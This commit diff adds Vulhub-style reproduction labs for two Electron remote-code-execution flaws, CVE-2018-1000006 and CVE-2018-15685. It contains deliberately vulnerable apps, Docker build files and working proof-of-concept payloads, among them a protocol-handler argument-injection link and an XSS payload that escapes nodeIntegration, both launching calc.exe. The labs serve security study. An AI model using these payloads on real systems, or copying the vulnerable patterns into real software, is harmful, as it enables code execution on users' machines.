first commit

electron/.gitignore

@@ -0,0 +1 @@
+package-lock.json

electron/CVE-2018-1000006/README.md

@@ -0,0 +1,41 @@
+# Electron Remote Code Execution Vulnerability（CVE-2018-1000006）
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Electron is an open source library developed by GitHub for building cross-platform desktop applications with HTML, CSS, and JavaScript. Electron accomplishes this by combining Chromium and Node.js into a single runtime and apps can be packaged for Mac, Windows, and Linux.
+
+On Windows, if an application developed by Electron registers a Protocol Handler (allowing the user to call the application in the browser), a parameter injection vulnerability may occur and eventually cause remote code vulnerability on the user side.
+
+Reference link:[Electron < v1.8.2-beta.4 远程命令执行漏洞—【CVE-2018-1000006】](https://xianzhi.aliyun.com/forum/topic/1990)
+
+## Setup
+
+Execute the following commands to compile an vulnerability application:
+
+```
+docker compose run -e ARCH=64 --rm electron
+```
+
+Because the software needs to run on the Windows platform, it is necessary to set the value of the ARCH to the number of bits of the platform: 32 or 64.
+
+After the compilation completed, execute the following command to run the web service:
+
+```
+docker compose run --rm -p 8080:80 web
+```
+
+Now, access`http://your-ip:8080/`You can see the POC page.
+
+## Exploit
+
+First, on the POC page, click on the first link and download the compiled software `vulhub-app.tar.gz`. After the download is complete, extract it and run it once:
+
+![](1.png)
+
+This time the Protocol Handler will be registered.
+
+Then, go back to the POC page and click on the second link. The target software and calculator will pop up:
+
+![](2.png)
+
+> If fails, it may be browser's reason. After testing, the new Chrome browser will call vulhub-app when it clicks on the POC, but it will not execute calc.exe.

electron/CVE-2018-1000006/README.zh-cn.md

@@ -0,0 +1,39 @@
+# electron 远程命令执行漏洞（CVE-2018-1000006）
+
+Electron是由Github开发，用HTML，CSS和JavaScript来构建跨平台桌面应用程序的一个开源库。 Electron通过将Chromium和Node.js合并到同一个运行时环境中，并将其打包为Mac，Windows和Linux系统下的应用来实现这一目的。
+
+在Windows下，如果Electron开发的应用注册了Protocol Handler（允许用户在浏览器中召起该应用），则可能出现一个参数注入漏洞，并最终导致在用户侧执行任意命令。
+
+参考链接：[Electron < v1.8.2-beta.4 远程命令执行漏洞—【CVE-2018-1000006】](https://xianzhi.aliyun.com/forum/topic/1990)
+
+## 编译APP
+
+执行如下命令编译一个包含漏洞的应用：
+
+```
+docker compose run -e ARCH=64 --rm electron
+```
+
+上述命令中，因为软件需要在Windows平台上运行，所以需要设置ARCH的值为平台的位数：32或64。
+
+编译完成后，再执行如下命令，启动web服务：
+
+```
+docker compose run --rm -p 8080:80 web
+```
+
+此时，访问`http://your-ip:8080/`即可看到POC页面。
+
+## 复现漏洞
+
+首先，在POC页面，点击第一个链接，下载编译好的软件`vulhub-app.tar.gz`。下载完成后解压，并运行一次：
+
+![](1.png)
+
+这一次将注册Protocol Handler。
+
+然后，再回到POC页面，点击第二个链接，将会弹出目标软件和计算器：
+
+![](2.png)
+
+> 如果没有成功，可能是浏览器原因。经测试，新版Chrome浏览器点击POC时，会召起vulhub-app，但不会触发该漏洞。

electron/CVE-2018-1000006/build/index.html

@@ -0,0 +1,11 @@
+<!DOCTYPE html>
+<html>
+  <head>
+    <title>CVE-2018-1000006 POC</title>
+  </head>
+  <body>
+    <h1>CVE-2018-1000006 POC</h1>
+    <p>download the <a href="./vulhub-app.tar.gz">vulhub-app.tar.gz</a></p>
+    <p>and <a href='vulhub://example.com/" "--no-Sandbox" "--gpu-launcher=calc.exe'>click me</a></p>
+  </body>
+</html>

electron/CVE-2018-1000006/docker-compose.yml

@@ -0,0 +1,15 @@
+version: '2'
+services:
+ electron:
+   image: vulhub/electron:wine
+   command: bash /docker-entrypoint.sh
+   volumes:
+    - ./src:/project
+    - ./build:/build
+    - ./docker-entrypoint.sh:/docker-entrypoint.sh
+ web:
+   image: nginx:1
+   volumes:
+    - ./build:/usr/share/nginx/html
+   ports:
+    - "8080:80"

electron/CVE-2018-1000006/docker-entrypoint.sh

@@ -0,0 +1,10 @@
+#!/bin/bash
+
+set -ex 
+
+cd /project && npm install && npm run build-${ARCH:=64}
+
+if [ -d "/build/vulhub-app-win32-x64" ] || [ -d "/build/vulhub-app-win32-ia32" ]; then
+    tar -zcvf /build/vulhub-app.tar.gz /build/vulhub-app-win32-*
+    rm -rf /build/vulhub-app-win32-*
+fi

electron/CVE-2018-1000006/src/index.html

@@ -0,0 +1,11 @@
+<!DOCTYPE html>
+<html>
+  <head>
+    <title>Hello World!</title>
+  </head>
+  <body>
+    <h1>Hello World!</h1>
+    This is a demo for CVE-2018-1000006</br> 
+    Electron version:<script>document.write(process.versions['electron'])</script>.
+  </body>
+</html>

electron/CVE-2018-1000006/src/main.js

@@ -0,0 +1,57 @@
+const {app, BrowserWindow} = require('electron')
+const path = require('path')
+const url = require('url')
+const dialog = require('electron').dialog
+// Keep a global reference of the window object, if you don't, the window will
+// be closed automatically when the JavaScript object is garbage collected.
+let win
+
+function createWindow () {
+  // Create the browser window.
+  win = new BrowserWindow({width: 800, height: 600})
+
+  // and load the index.html of the app.
+  win.loadURL(url.format({
+    pathname: path.join(__dirname, 'index.html'),
+    protocol: 'file:',
+    slashes: true
+  }))
+
+
+  // Emitted when the window is closed.
+  win.on('closed', function(){
+    // Dereference the window object, usually you would store windows
+    // in an array if your app supports multi windows, this is the time
+    // when you should delete the corresponding element.
+    win = null
+  })
+}
+
+// This method will be called when Electron has finished
+// initialization and is ready to create browser windows.
+// Some APIs can only be used after this event occurs.
+app.on('ready', createWindow)
+
+// Quit when all windows are closed.
+app.on('window-all-closed', () => {
+  // On macOS it is common for applications and their menu bar
+  // to stay active until the user quits explicitly with Cmd + Q
+  if (process.platform !== 'darwin') {
+    app.quit()
+  }
+})
+
+app.on('activate', function(){
+  // On macOS it's common to re-create a window in the app when the
+  // dock icon is clicked and there are no other windows open.
+
+  if (win === null) {
+    createWindow()
+  }
+})
+app.setAsDefaultProtocolClient('vulhub')
+
+app.on('open-url', function (event, url) {
+  dialog.showErrorBox('Welcome Back', `You arrived from: ${url}`)
+})
+

electron/CVE-2018-1000006/src/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "vulhub-app",
+  "version": "0.0.1",
+  "main": "main.js",
+  "scripts": {
+    "build-32": "electron-packager . vulhub-app --platform=win32 --arch=ia32 --electronVersion=1.8.1 --appVersion=0.0.1 --out=/build",
+    "build-64": "electron-packager . vulhub-app --platform=win32 --arch=x64 --electronVersion=1.8.1 --appVersion=0.0.1 --out=/build"
+  },
+  "devDependencies": {
+    "electron-packager": "^12.0.2"
+  }
+}

electron/CVE-2018-15685/README.md

@@ -0,0 +1,50 @@
+# Electron WebPreferences Remote Code Execution Vulnerability（CVE-2018-15685）
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Electron is an open source library developed by GitHub for building cross-platform desktop applications with HTML, CSS, and JavaScript. Electron accomplishes this by combining Chromium and Node.js into a single runtime and apps can be packaged for Mac, Windows, and Linux.
+
+When Electron sets `nodeIntegration=false` (default), the JavaScript in the page cannot access the built-in library of node.js. CVE-2018-15685 bypass this limitation, enabling arbitrary commands to be executed if the user can execute JavaScript (such as when accessing a third-party page or an XSS vulnerability exists in the app).
+
+Reference links:
+
+- https://electronjs.org/blog/web-preferences-fix
+- https://www.contrastsecurity.com/security-influencers/cve-2018-15685
+
+## Compile application
+
+Execute the following command to compile an  vulnerability application:
+
+```
+docker compose run -e PLATFORM=win64 --rm electron
+```
+
+The value of `PLATFORM` is the operating system on which the application is running. The options are:`win64`、`win32`、`mac`、`linux`。
+
+After the compilation completed, execute the following command to run the web service:
+
+```
+docker compose run --rm -p 8080:80 web
+```
+
+Now，access`http://your-ip:8080/cve-2018-15685.tar.gz`to download application.
+
+## expliot
+
+Open the app:
+
+![](1.png)
+
+Click submit, the content in the input box will be displayed in the app, and there is obviously an XSS vulnerability.
+
+We submit `<img src=1 onerror="require('child_process').exec('calc.exe')">` and find that nothing happens, because `nodeIntegration=false`.
+
+At this time, submit the POC (Windows):
+
+```
+<img src=1 onerror="window.open().open('data:text/html,<script>require(\'child_process\').exec(\'calc.exe\')</script>');">
+```
+
+As you see, calc.exe shows up.
+
+![](2.png)

electron/CVE-2018-15685/README.zh-cn.md

@@ -0,0 +1,48 @@
+# Electron WebPreferences 远程命令执行漏洞（CVE-2018-15685）
+
+Electron是由Github开发，用HTML，CSS和JavaScript来构建跨平台桌面应用程序的一个开源库。 Electron通过将Chromium和Node.js合并到同一个运行时环境中，并将其打包为Mac，Windows和Linux系统下的应用来实现这一目的。
+
+Electron在设置了`nodeIntegration=false`的情况下（默认），页面中的JavaScript无法访问node.js的内置库。CVE-2018-15685绕过了该限制，导致在用户可执行JavaScript的情况下（如访问第三方页面或APP存在XSS漏洞时），能够执行任意命令。
+
+参考链接：
+
+- https://electronjs.org/blog/web-preferences-fix
+- https://www.contrastsecurity.com/security-influencers/cve-2018-15685
+
+## 编译APP
+
+执行如下命令编译一个包含漏洞的应用：
+
+```
+docker compose run -e PLATFORM=win64 --rm electron
+```
+
+其中PLATFORM的值是运行该应用的操作系统，可选项有：`win64`、`win32`、`mac`、`linux`。
+
+编译完成后，再执行如下命令，启动web服务：
+
+```
+docker compose run --rm -p 8080:80 web
+```
+
+此时，访问`http://your-ip:8080/cve-2018-15685.tar.gz`即可下载编译好的应用。
+
+## 复现漏洞
+
+在本地打开应用：
+
+![](1.png)
+
+点击提交，输入框中的内容将会显示在应用中，显然这里存在一处XSS漏洞。
+
+我们提交`<img src=1 onerror="require('child_process').exec('calc.exe')">`，发现没有任何反馈，原因就是`nodeIntegration=false`。
+
+此时，提交POC（Windows）：
+
+```
+<img src=1 onerror="window.open().open('data:text/html,<script>require(\'child_process\').exec(\'calc.exe\')</script>');">
+```
+
+可见，calc.exe已成功弹出：
+
+![](2.png)

electron/CVE-2018-15685/build/.gitignore

@@ -0,0 +1 @@
+*.tar.gz

electron/CVE-2018-15685/docker-compose.yml

@@ -0,0 +1,15 @@
+version: '2'
+services:
+ electron:
+   image: vulhub/electron:wine
+   command: bash /docker-entrypoint.sh
+   volumes:
+    - ./src:/project
+    - ./build:/build
+    - ./docker-entrypoint.sh:/docker-entrypoint.sh
+ web:
+   image: nginx:1
+   volumes:
+    - ./build:/usr/share/nginx/html
+   ports:
+    - "8080:80"

electron/CVE-2018-15685/docker-entrypoint.sh

@@ -0,0 +1,8 @@
+#!/bin/bash
+
+set -ex 
+
+cd /project && npm install && npm run build-${PLATFORM:=win64}
+
+tar -zcvf /build/cve-2018-15685.tar.gz /build/cve-2018-15685-* --exclude /build/cve-2018-15685.tar.gz
+rm -rf /build/cve-2018-15685-*

electron/CVE-2018-15685/src/index.html

@@ -0,0 +1,21 @@
+<!DOCTYPE html>
+<html>
+  <head>
+    <meta charset="UTF-8">
+    <title>Hello World!</title>
+  </head>
+  <body>
+    <h1>Hello World!</h1>
+    <p>This window does not have access to node bindings.</p>
+    <pre>process: <script>document.write(process)</script></pre>
+
+    <p id="content">output...</p>
+    <p>
+      <label>input your script: </label>
+      <textarea rows="5" cols="20" id="script"></textarea>
+
+      <input type="button" onclick="document.getElementById('content').innerHTML = document.getElementById('script').value" value="Submit">
+    </p>
+    
+  </body>
+</html>

electron/CVE-2018-15685/src/main.js

@@ -0,0 +1,59 @@
+// Modules to control application life and create native browser window
+const {app, BrowserWindow} = require('electron')
+
+// Keep a global reference of the window object, if you don't, the window will
+// be closed automatically when the JavaScript object is garbage collected.
+let mainWindow
+
+function createWindow () {
+  // Create the browser window.
+  mainWindow = new BrowserWindow(
+    {
+      width: 800, 
+      height: 600,
+      "webPreferences": {
+        "nodeIntegration": false,
+        "nativeWindowOpen": true
+      }
+    }
+  );
+
+  // and load the index.html of the app.
+  mainWindow.loadFile('index.html');// this could be remote content
+
+  // Open the DevTools.
+  // mainWindow.webContents.openDevTools()
+
+  // Emitted when the window is closed.
+  mainWindow.on('closed', function () {
+    // Dereference the window object, usually you would store windows
+    // in an array if your app supports multi windows, this is the time
+    // when you should delete the corresponding element.
+    mainWindow = null
+  })
+}
+
+// This method will be called when Electron has finished
+// initialization and is ready to create browser windows.
+// Some APIs can only be used after this event occurs.
+app.on('ready', createWindow)
+
+// Quit when all windows are closed.
+app.on('window-all-closed', function () {
+  // On OS X it is common for applications and their menu bar
+  // to stay active until the user quits explicitly with Cmd + Q
+  if (process.platform !== 'darwin') {
+    app.quit()
+  }
+})
+
+app.on('activate', function () {
+  // On OS X it's common to re-create a window in the app when the
+  // dock icon is clicked and there are no other windows open.
+  if (mainWindow === null) {
+    createWindow()
+  }
+})
+
+// In this file you can include the rest of your app's specific main process
+// code. You can also put them in separate files and require them here.

electron/CVE-2018-15685/src/package.json

@@ -0,0 +1,14 @@
+{
+  "name": "cve-2018-15685",
+  "version": "0.0.1",
+  "main": "main.js",
+  "scripts": {
+    "build-win32": "electron-packager . cve-2018-15685 --platform=win32 --arch=ia32 --electronVersion=2.0.7 --appVersion=0.0.1 --out=/build --overwrite",
+    "build-win64": "electron-packager . cve-2018-15685 --platform=win32 --arch=x64 --electronVersion=2.0.7 --appVersion=0.0.1 --out=/build --overwrite",
+    "build-mac": "electron-packager . cve-2018-15685 --platform=darwin --arch=x64 --electronVersion=2.0.7 --appVersion=0.0.1 --out=/build --overwrite",
+    "build-linux": "electron-packager . cve-2018-15685 --platform=linux --arch=x64 --electronVersion=2.0.7 --appVersion=0.0.1 --out=/build --overwrite"
+  },
+  "devDependencies": {
+    "electron-packager": "^12.0.2"
+  }
+}